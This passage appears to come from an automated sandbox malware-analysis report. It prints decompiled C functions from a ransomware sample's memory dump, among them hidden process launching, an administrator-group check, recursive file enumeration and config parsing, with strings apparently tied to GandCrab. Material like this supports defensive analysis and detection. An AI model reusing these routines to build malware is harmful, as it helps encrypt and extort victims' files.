									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0fbb69b3
0x0fbb69bc
0x0fbb69be
0x0fbb69d2
0x0fbb69d7
0x0fbb69dc
0x0fbb69f0
0x0fbb69fa
0x0fbb69e0
0x0fbb69e0
0x0fbb69e6
0x0fbb69e9
0x0fbb69ea
0x00000000
0x00000000
0x00000000
0x0fbb69ea
0x0fbb69ee
0x0fbb6a17
0x0fbb6a1f
0x0fbb6a25
0x0fbb6a2b
0x0fbb6a30
0x0fbb6a36
0x0fbb6a82
0x0fbb6a89
0x0fbb6a8c
0x0fbb6a38
0x0fbb6a38
0x0fbb6a3e
0x0fbb6a42
0x0fbb6a44
0x0fbb6a44
0x0fbb6a49
0x0fbb6a69
0x0fbb6a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb6a4b
0x0fbb6a50
0x0fbb6a50
0x0fbb6a56
0x00000000
0x00000000
0x0fbb6a5c
0x0fbb6a5e
0x00000000
0x0fbb6a60
0x0fbb6a60
0x0fbb6a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb6a67
0x00000000
0x0fbb6a5e
0x0fbb6a80
0x0fbb6a80
0x00000000
0x0fbb6a80
0x00000000
0x0fbb6a6f
0x0fbb6a6f
0x0fbb6a73
0x0fbb6a76
0x0fbb6a79
0x0fbb6a7e
0x0fbb6a3e
0x0fbb6a8f
0x0fbb6a97
0x0fbb6aa6
0x00000000
0x00000000
0x00000000
0x0fbb69ee
0x0fbb69c0
0x0fbb69c9
0x0fbb69c9

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FBB6AEA), ref: 0FBB69D2

Strings

%s , xrefs: 0FBB6A19

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: f6dfcf54def013edfdc27f05f1d423163bd3c341ecebc347293c99149616880b
Instruction ID: bcb12271d3a705aa32e0006170fefc1997222dfa893205e05b2295bfb0d3097a
Opcode Fuzzy Hash: f6dfcf54def013edfdc27f05f1d423163bd3c341ecebc347293c99149616880b
Instruction Fuzzy Hash: 46215732A0022597DB304B5DBC403F273AEEB84321F4482EEEC469B181E7F4AE418ED0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBB4E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FBB9170( &_v92, 0, 0x44);
				_t15 =  *0xfbc2a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfbc2a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0fbb4e1c
0x0fbb4e22
0x0fbb4e24
0x0fbb4e29
0x0fbb4e2e
0x0fbb4e36
0x0fbb4e39
0x0fbb4e3c
0x0fbb4e41
0x0fbb4e48
0x0fbb4e4d
0x0fbb4e58
0x0fbb4e77
0x0fbb4e8d
0x0fbb4e98
0x0fbb4e79
0x0fbb4e83
0x0fbb4e83

APIs

_memset.LIBCMT ref: 0FBB4E29
CreateProcessW.KERNEL32 ref: 0FBB4E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0FBB4E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBB4E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBB4E92

Strings

D, xrefs: 0FBB4E58

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 815a1c2af2136bdfdd10eba54fa1a79e2cdd257fd9c890f7d2905c1fbfaf0fec
Instruction ID: cbbe1e4bba63694368cac8bafd757364671ee09641ac2da1696b4e8cc6412c4c
Opcode Fuzzy Hash: 815a1c2af2136bdfdd10eba54fa1a79e2cdd257fd9c890f7d2905c1fbfaf0fec
Instruction Fuzzy Hash: BC012171E40318ABDB20DFA99C46BDE7BB8EF09715F100156FA08F7180E7B565548F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0FBB3C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0fbb3c79
0x0fbb3c99
0x0fbb3ca0
0x0fbb3ca8
0x0fbb3cbf
0x0fbb3cce
0x0fbb3cd5
0x0fbb3cd7
0x0fbb3cda
0x0fbb3ce6
0x0fbb3cad
0x0fbb3cad
0x0fbb3cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBB3CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FBB3CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FBB3CBF
FreeSid.ADVAPI32(?), ref: 0FBB3CDA

Strings

advapi32.dll, xrefs: 0FBB3CAE
CheckTokenMembership, xrefs: 0FBB3CB9

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: dcf211527cd89787cba1b958a35b652a87daeab32d7802483d965180273b42f6
Instruction ID: a2a022564b2cba7b5471e4536571ce36ce8ac6f680069a7668cbcef8682427ae
Opcode Fuzzy Hash: dcf211527cd89787cba1b958a35b652a87daeab32d7802483d965180273b42f6
Instruction Fuzzy Hash: 72F03730E80309BBEB109BE5EC0AFBDB7BCEB04716F400588F900A6181E7B866158F55

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0FBB6E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FBB6AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FBB6DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0fbb6e70
0x0fbb6e84
0x0fbb6ea8
0x0fbb6eb1
0x0fbb6ee2
0x0fbb6eed
0x0fbb6eef
0x0fbb6ef2
0x0fbb6ef5
0x0fbb6ef7
0x0fbb6f00
0x0fbb6f00
0x0fbb6f03
0x0fbb6f03
0x0fbb6ef9
0x0fbb6efc
0x0fbb6efe
0x00000000
0x00000000
0x0fbb6efe
0x0fbb6ef7
0x0fbb6eb3
0x0fbb6ec7
0x0fbb6ecc
0x0fbb6f10
0x0fbb6f10
0x0fbb6f23
0x0fbb6f2e
0x0fbb6f3c

APIs

lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6E7C
lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6E96
lstrcatW.KERNEL32 ref: 0FBB6EA8
lstrcatW.KERNEL32 ref: 0FBB6EB9

Part of subcall function 0FBB6DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6E23
Part of subcall function 0FBB6DF0: lstrcatW.KERNEL32 ref: 0FBB6E3B
Part of subcall function 0FBB6DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBB6F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FBB6F2E

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: a62c32935ba6be526a8d0df973a89dcb5e32c7f04cfa3d81664b1725c8da82e6
Instruction ID: f988022af3118aae7eadf513d4693cbc559b5777a4034e97518a79b530bfedee
Opcode Fuzzy Hash: a62c32935ba6be526a8d0df973a89dcb5e32c7f04cfa3d81664b1725c8da82e6
Instruction Fuzzy Hash: F1018031E0020DAACF219BA1EC48BFE7BBDEF04201F4040E9F805D2021DBB59A51DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0fbb3205
0x0fbb3208
0x0fbb320a
0x0fbb320e
0x0fbb321f
0x0fbb321f
0x0fbb3223
0x00000000
0x0fbb3225
0x0fbb3226
0x0fbb322a
0x0fbb3230
0x0fbb3235
0x0fbb3239
0x00000000
0x00000000
0x0fbb323b
0x00000000
0x0fbb3239
0x0fbb3245
0x0fbb3245
0x0fbb3248
0x0fbb3248
0x0fbb324e
0x0fbb3270
0x0fbb3273
0x0fbb3284
0x0fbb328a
0x00000000
0x0fbb328a
0x0fbb3250
0x0fbb3251
0x0fbb3262
0x0fbb3268
0x0fbb328d
0x0fbb328f
0x0fbb3293
0x0fbb3293
0x0fbb328f
0x0fbb3299
0x0fbb32a5
0x0fbb32a5
0x0fbb3210
0x0fbb3210
0x0fbb3214
0x0fbb3217
0x00000000
0x0fbb3219
0x0fbb3219
0x0fbb321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb321d
0x00000000
0x0fbb3217
0x0fbb323e
0x0fbb3242
0x0fbb3242
0x00000000

APIs

lstrlenA.KERNEL32(0FBB5444,00000000,?,0FBB5445,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3251
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB325B
HeapAlloc.KERNEL32(00000000,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3262
lstrlenA.KERNEL32(0FBB5444,00000000,?,0FBB5445,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3273
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB327D
HeapAlloc.KERNEL32(00000000,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3284
lstrcpyA.KERNEL32(00000000,0FBB5444,?,0FBB34BF,0FBB5445,00000001,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB3293

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: f31fa2fac0a4788db56339767050c0e427a805ac49c2448309eef02f9038b7ae
Instruction ID: 769a1d96ad700ca8cbc137a99bcebb87efd93f84180598d053040ae9a5c1ce81
Opcode Fuzzy Hash: f31fa2fac0a4788db56339767050c0e427a805ac49c2448309eef02f9038b7ae
Instruction Fuzzy Hash: FA1193304042946EDB612E68E8087F6BBDCEF03761F684199EDC5CB202C7B9A4578F61

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB33E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FBB32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FBB3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FBB3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FBB3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0fbb33e3
0x0fbb33e5
0x0fbb33e9
0x0fbb33eb
0x0fbb33ee
0x0fbb33f1
0x0fbb33f8
0x0fbb34db
0x0fbb34db
0x0fbb3410
0x0fbb3425
0x0fbb342b
0x0fbb342f
0x00000000
0x0fbb3431
0x0fbb3432
0x0fbb3434
0x0fbb343a
0x0fbb3441
0x0fbb3444
0x0fbb344a
0x0fbb344b
0x0fbb34ba
0x0fbb344d
0x0fbb344e
0x0fbb3450
0x0fbb3452
0x0fbb3456
0x0fbb3467
0x0fbb3467
0x0fbb346b
0x0fbb346d
0x0fbb3471
0x0fbb3473
0x0fbb3478
0x0fbb347c
0x00000000
0x00000000
0x0fbb347e
0x00000000
0x0fbb347c
0x0fbb3480
0x0fbb3480
0x0fbb3483
0x0fbb3484
0x0fbb3495
0x0fbb349e
0x0fbb34a3
0x0fbb34a7
0x0fbb34a7
0x0fbb34ad
0x0fbb34b0
0x0fbb34b0
0x00000000
0x0fbb3458
0x0fbb345c
0x0fbb345f
0x00000000
0x0fbb3461
0x0fbb3461
0x0fbb3465
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb3465
0x00000000
0x0fbb345f
0x0fbb3458
0x0fbb3456
0x0fbb344e
0x0fbb344b
0x0fbb3444
0x0fbb34bf
0x0fbb34bf
0x0fbb34bf
0x0fbb34c2
0x0fbb34c3
0x0fbb34d6
0x0fbb34d6
0x0fbb3412
0x0fbb3412
0x0fbb3418
0x0fbb3422
0x0fbb3422

APIs

Part of subcall function 0FBB32B0: lstrlenA.KERNEL32(?,00000000,?,0FBB5444,?,?,0FBB33F6,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB32C5
Part of subcall function 0FBB32B0: lstrlenA.KERNEL32(?,?,0FBB33F6,00000000,00000000,?,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB32EE

lstrlenA.KERNEL32(0FBB5445,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB3484
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB348E
HeapAlloc.KERNEL32(00000000,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB3495
lstrcpyA.KERNEL32(00000000,0FBB5445,?,0FBB5444,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB34A7
ExitProcess.KERNEL32 ref: 0FBB34DB

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: df7d5ad6501c244b57b39a5e6060d47f73eaa38cfa76b818238b7a9e9828c9ee
Instruction ID: e50c35a6ea4148419281344d6d83806a99daf0e1fe3814a643b07d211a93c61a
Opcode Fuzzy Hash: df7d5ad6501c244b57b39a5e6060d47f73eaa38cfa76b818238b7a9e9828c9ee
Instruction Fuzzy Hash: 5731E3305042455AEB265F28B8447FA7BD8DB02310F9C41DDE885DB283E6FDA8878FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0FBB3D42
VerSetConditionMask.KERNEL32 ref: 0FBB3D66
VerSetConditionMask.KERNEL32 ref: 0FBB3D6A
VerSetConditionMask.KERNEL32 ref: 0FBB3D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBB3D95

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 520cc13b6203e170b779fc59b4e31c01161c116e640f2763837ded457839a1e2
Instruction ID: 52a7a6e9436fda4a9f9845e3f42103c9fd8fd5025e47f35e132f740bacba6794
Opcode Fuzzy Hash: 520cc13b6203e170b779fc59b4e31c01161c116e640f2763837ded457839a1e2
Instruction Fuzzy Hash: 1D111BB0D4031C7EEB609F65DC0ABEA7ABCEB08700F0081D9A608E71C1D6B85B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB4EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfbbfaac]");
				_t16 =  *0xfbbfab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0fbb4ea6
0x0fbb4eae
0x0fbb4eb4
0x0fbb4eb9
0x0fbb4ebc
0x0fbb4ec1
0x0fbb4ec6
0x0fbb4ec9
0x0fbb4f1a
0x0fbb4f1c
0x00000000
0x0fbb4f1e
0x0fbb4f22
0x0fbb4f5f
0x0fbb4f61
0x00000000
0x0fbb4f63
0x0fbb4f6d
0x0fbb4f70
0x0fbb4f70
0x0fbb4f74
0x00000000
0x00000000
0x0fbb4f7a
0x0fbb4f7a
0x0fbb4f7d
0x0fbb4f80
0x0fbb4f80
0x0fbb4f84
0x00000000
